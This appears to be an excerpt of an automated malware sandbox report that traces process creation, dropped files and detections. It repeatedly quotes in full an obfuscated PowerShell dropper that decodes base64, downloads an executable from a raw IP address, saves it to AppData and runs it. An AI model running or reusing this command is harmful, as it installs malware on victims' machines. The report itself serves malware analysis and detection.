iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Suspicious command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00104B37 LoadLibraryA,GetProcAddress,6_2_00104B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05024777 push eax; iretd 3_2_0502478A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_050223B5 pushad ; retf 0007h3_2_050223BA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_050248A0 push ebp; iretd 3_2_050248B2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05022B4D pushfd ; retf 3_2_05022B4F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05023FB9 push eax; iretd 3_2_0502478A
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016848F push FFFFFF8Bh; iretd 6_2_00168491
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0010C4C7 push A30010BAh; retn 0010h6_2_0010C50D
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00128945 push ecx; ret 6_2_00128958
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EF273 push ebp; retf 7_2_008EF281
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\cssos[1].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cosse.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00185376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00185376
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00123187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00123187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
